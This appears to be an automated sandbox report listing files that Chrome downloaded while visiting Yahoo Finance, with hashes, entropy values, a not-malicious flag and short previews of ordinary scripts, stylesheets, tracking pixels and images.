                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:body:has(div[data-ad-config=disable-e2e]) #sda-E2E{display:none}#sda-E2E{min-height:90px;background-color:var(--surface3);box-sizing:content-box}body:has(div[data-ad-config=large-placeholder-e2e]) #sda-E2E{min-height:250px}@media only screen and (max-width: 767px){body:has(div[data-ad-config=sticky-e2e]) #sda-E2E{position:sticky;top:0;z-index:11}#sda-E2E,body:has(div[data-ad-config=large-placeholder-e2e]) #sda-E2E{min-height:50px}}div[data-ad-config].yf-u7ti49{display:none}@layer theme{:root{--size-border-radius-none:0;--size-border-radius-xs:.125rem;--size-border-radius-s:.25rem;--size-border-radius-m:.5rem;--size-border-radius-l:1rem;--size-border-radius-xl:2rem;--size-border-radius-2xl:2.25rem;--size-font-xs:.6875rem;--size-font-s:.75rem;--size-font-m:.875rem;--size-font-l:1rem;--size-font-xl:1.125rem;--size-font-2xl:1.25rem;--size-font-3xl:1.5rem;--size-font-4xl:1.75rem;--size-font-5xl:1.875rem;--size-font-6xl:2rem;--size-font-7xl:2.375rem;--size-font-8xl:2.5rem;--size-font-10xl:3.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537072399&val=7992184014990425658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15264)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.53729719471769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:uQTCfjv99mW+911+Fl0YD0Dew/X2q5ulRIUeT:uQTCfGZ1+Fj9w/XuuT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E2202E6ED6EF52CEC2C4A875C99225BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FD48D3157CFA6B6E6FEC3E50787E357AA3288C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2CFBD195DFF011843F93E2D32979F6F07926211CBF3EDDDC3B708B0BB04C8A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E2AEFD87D89F4D5C00CFCAC8EE2D7748F84979BE9E66272475A621A19BA8FC884737DF604B3B7344FE4EB0C1154819880BC3769E25798BB4ABDDEF76EDC9B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/__rapidworker-1.2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* @preserve. * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $. *. * Original:. * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt. */./* @preserve. * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp>. * Version: 1.0.1. * LastModified: Dec 25 1999. */./**. * @preserve This code contains an altered version of the original source and is not meant to misrepresent the original software.. */.function base64(r){if("undefined"!=typeof btoa)return btoa(r);for(var t,e,n,f,o,i,a,l="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",u=[],s=0;r.length>s;)t=r.charCodeAt(s++),e=r.charCodeAt(s++),n=r.charCodeAt(s++),f=t>>2,o=(3&t)<<4|e>>4,i=(15&e)<<2|n>>6,a=63&n,isNaN(e)?i=a=64:isNaN(n)&&(a=64),u.push(l.charAt(f)+l.charAt(o)+l.charAt(i)+l.charAt(a));return u.join("")}function lzw_encode(r){for(var t,e={},n=(r+"").split(""),f=[],o=n[0],i=256,a=n.length,l=1;a>l;l++)t=n[l],null!=e[o+t]?o+=t:(f.push(o.length>1?e[o]:o.charCodeAt(0)),e[o+t]=i,i++,o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (20681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.382951729807628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:W4Oh1nYxEHnaDSA9O3gcXpe62Oaqz66VSwyKTWf6S6hYrJBq91D:Wtewg6dcOWyS66I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F4BA31A6A1D636440EB73ADA2C312201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92A49D852D46B7E66DB1679014C692589D9803D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:596842C18CBF89B94E83E196E6B2A68DC4899B568C4129E2930C00797B8CC65C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6ADB18F26D737F5AC85EE1D35757DA9352A859C6766D4CB345B500EDB3AFDD3589EE2696526BE1008AE65E0E08EC590459ECA2E85F1E652FA54336AD9BD4BBAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/protobufjs@7.1.2/dist/minimal/protobuf.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*!. * protobuf.js v7.1.0 (c) 2016, daniel wirtz. * compiled thu, 22 sep 2022 17:16:11 utc. * licensed under the bsd-3-clause license. * see: https://github.com/dcodeio/protobuf.js for details. */.!function(d){"use strict";!function(r,u,t){var n=function t(n){var i=u[n];return i||r[n][0].call(i=u[n]={exports:{}},t,i,i.exports),i.exports}(t[0]);n.util.global.protobuf=n,"function"==typeof define&&define.amd&&define(["long"],function(t){return t&&t.isLong&&(n.util.Long=t,n.configure()),n}),"object"==typeof module&&module&&module.exports&&(module.exports=n)}({1:[function(t,n,i){n.exports=function(t,n){var i=Array(arguments.length-1),e=0,r=2,s=!0;for(;r<arguments.length;)i[e++]=arguments[r++];return new Promise(function(r,u){i[e]=function(t){if(s)if(s=!1,t)u(t);else{for(var n=Array(arguments.length-1),i=0;i<n.length;)n[i++]=arguments[i];r.apply(null,n)}};try{t.apply(n||null,i)}catch(t){s&&(s=!1,u(t))}})}},{}],2:[function(t,n,i){i.length=function(t){var n=t.length;if(!n)return 0;for(var i=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4249), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.242820679038457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:a6z95q7wimgV1H1BSaQg77uSy7hG1UrpsUtKkmxMtP7iCs5wqrtgfP7cujy/L4:a6x5Tg/C1cuS3W6kKpMtPeCPqrSfnjyk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BCDA778B736C3A054AF62F437B536E78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:08E2CDBD2D1CA160834B205D6748DC2CAB5FDD99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:892E2F5E07FEF6DE0428E4DCB284201B3D110C0A6F2D8EF899CD2CD2C61EB546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A0D6449A03045E723D2F668898541625E36D7394E30327F5E89E1F0640F97A1A0268F500D89E804CD8DC8FBF395DBDFA71B429E89E737E3C2DAC7A2C196EA3A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}!function(){var e,n,t,o,r=window,a=r.onerror,i=["apptype","rid","bucketId","bucket","device","osName","browserName","browserVersion"],c=/^resource:\/\//,s=/ActionScript|Decompress\sfail/,f={beaconPath:"p.gif",site:"fp"},d=0,w=function(){var e=r.navigator&&(navigator.connection||navigator.mozConnection||navigator.webkitConnection)||{};return{downlink:e.downlink||"",downlinkMax:e.downlinkMax||"",effectiveType:e.effectiveType||"",rtt:e.rtt||"",saveData:e.saveData||"",type:e.type||""}},u=function(){var e=r.YAHOO&&r.YAHOO.context||r.Af&&r.Af.context||{},n="";return i.forEach((function(t){"undefined"!==_typeof(e[t])&&(n+="&".concat(encodeURIComponent(t),"=").concat(encodeURIComponent(e[t])))})),n},g=function(e,n,t,o){if(!(d>3||r.naviga
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1411)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.330073582560628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:PIXznPOPCxW74s3VR/fAe3i+WdQxybVHsZkkzGp1S6fD7ZfAbJssngjbxBFS4sW:PIXznGsq3VRnAe3i+WuxQpayH77yus4l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4183A6BCB9EF94D4AD89261C68B25D93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ABA1EF0A008FE34C8A7BAB0325D2952AFE9C60C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9BC1A3D6427AB4884F7A9D25F759F0AF9D15D828F51099A543CE4B853FFAA926
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:041864FFFBD36E7E899D878821620384F32184423D5A4D2EEA251166733F1890DDE4537D940BED40CEB8C59D3D0E181BFE99A11E566357BF6B6A900E46E2BC78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQuote.BOFhtUlf.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as Q}from"./commonUtil.BWwawKjd.js";import{l as d,f as w}from"./logUtil.CCV3qKPL.js";const g=30;async function k(c,{symbols:r,fields:n,silent:f=!1,imgLabels:S="logoUrl",imgHeights:q="50",imgWidths:A="50"}){if(!r||!n){const e=new Error("Bad request for loadQuote");return d(c,{fields:n,silent:f,symbols:r},{data:e,perfLabel:"loadQuote"}),Promise.reject(e)}const[y]=await Q(["quote"],c),s=[],h=[],b=Array.isArray(r)?Array.from(new Set(r)):[r],l={};for(const e of b){const o=y.getQuote(e);if(o){const m={fromCurrency:!0,fromExchange:!0,headSymbolAsString:!0,toCurrency:!0,toExchange:!0,ticker:!0,sparkline:!0,underlyingExchangeSymbol:!0,underlyingSymbol:!0},p=n.filter(u=>!m[u]&&!o[u]);if(h.push(...p),p.length===0){l[e]=o;continue}}else h.push(...n);s.push(e)}if(s.length===0)return l;try{const e=Array.from(new Set(h)).join(","),o=[],m=Math.ceil(s.length/g);for(let t=0;t<m;t++){const a=Math.min((t+1)*g,s.length),i=s.slice(t*g,a);o.push(w(c,{crumb:!0,pathname:"/v7/finance/quote",perfLabel:"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.32203621037149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:+7yzk8YvPEi6qA0zonBU07qdgp1qds7dbaXxitE+7K1Uh++xnvQ956eY+pstV0hh:+7ZPvMzBfqSqAYUU+xnI9ovINZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/scripts/cds-pips.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7213)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.214208203980227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZKgIGQGIZVUhgGy8H72At6G+JsX/D9qYLYsGZKUG:xIrDV+xZ2AtewxLkNu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DADA04F94A4FC4D19AC57A29F0BEAB05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ABBC9E83436AEC35D71F4CAE162B49F31821E135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A9C978CE0E816FE6148ABDC5B90980B165BE9E12E49F068A2504291901C229DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A015C1EBAA29F1F12E00E7AF72D92D65C14DFF3EC618AF100BF0B651B8FA0A61B05C25611D343E6AB7ACC8DCDF58E7D6A8E14884BDC7D2E3AEE723E6FF80B5AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=-1,n=function(e){addEventListener("pageshow",(function(n){n.persisted&&(t=n.timeStamp,e(n))}),!0)},r=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},i=function(){var e=r();return e&&e.activationStart||0},a=function(e,n){var a=r(),o="navigate";return t>=0?o="back-forward-cache":a&&(document.prerendering||i()>0?o="prerender":document.wasDiscarded?o="restore":a.type&&(o=a.type.replace(/_/g,"-"))),{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:o}},o=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){t(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},n||{})),r}}catch(e){}},c=function(e,t,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4883
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9194796321245695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ad6b692lqfd74n4KCj+Gl+SGGby+NcNT6SJI0+JBboFe35p2M2g8fqGw:Tbql4n0+a+SGG2+K5JI/JBbbp7efpw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:62EB7CBD878F51E1353836F21FC8BB8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2872E212852BDD79BD3AFF50C30CDE8741EA8EAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:010988A9E0F13008F9636345B4C047679208717CEC38A00D778C57508862D411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FE59DBA2DE469CC41DF58D5E2276E9CE9F44EFCF9F74278CD1CAF003E86CDA78009F1FB79D57EBD3000C705F5FCC5A4AC3F68CDF0EA1DD63E4658DBD7CF9174
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Ticker.BZjnd4DS.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.ticker.yf-1jpysdn.yf-1jpysdn{--padding-y:var(--_padding-y, var(--space-1));--padding-x:var(--_padding-x, var(--space-2));--padding-left-logo:var(--space-1);--min-height:1.25rem;--logo-size:.75rem;--font-size:var(--ticker-name-font-size, var(--font-s));align-items:center;border-radius:var(--border-radius-xl);display:inline-flex;font-size:var(--font-size);font-weight:var(--font-medium);gap:var(--space-1);line-height:1.25;min-height:var(--ticker-min-height, var(--min-height));padding:var(--padding-y) var(--padding-x);text-align:center;width:-moz-fit-content;width:fit-content;max-width:100%}.ticker.ga.yf-1jpysdn.yf-1jpysdn{grid-area:ticker}.ticker.logo.yf-1jpysdn.yf-1jpysdn{padding-left:var(--padding-left-logo)}.ticker.stacked.yf-1jpysdn.yf-1jpysdn{border-radius:var(--border-radius-m);gap:.375rem;flex-direction:row}.ticker.stacked.yf-1jpysdn:hover .symbol.yf-1jpysdn,.ticker.stacked.yf-1jpysdn:focus .symbol.yf-1jpysdn{color:var(--hover-focus-color, var(--hovered-emph-same));-webkit-text-de
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, progressive, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):35933
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9459823662148015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:4YyH2X9YOBe5IcZ5vUk1O8S1OcTRFNJ8e/I2mEeIZieB:4Dk9I53/U9qQ73nPHeoB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:90AF20F9182B77F23627419FB4C51FEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEDC1306A272C4E3B67702F6F0F146A9FED400E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:11B950B09F3A0B374C2B889EFB424071CFF3C6B17E7BB26FDB3FDB8014D21C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:848FAA696DE805E84C4BC75C5B550FC999E0D174C25E71DA188F63DDC4EDB453CBB89DF144061A17741FA9808CFCEC3094408AB8A8B10800AA199B80A2231D05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
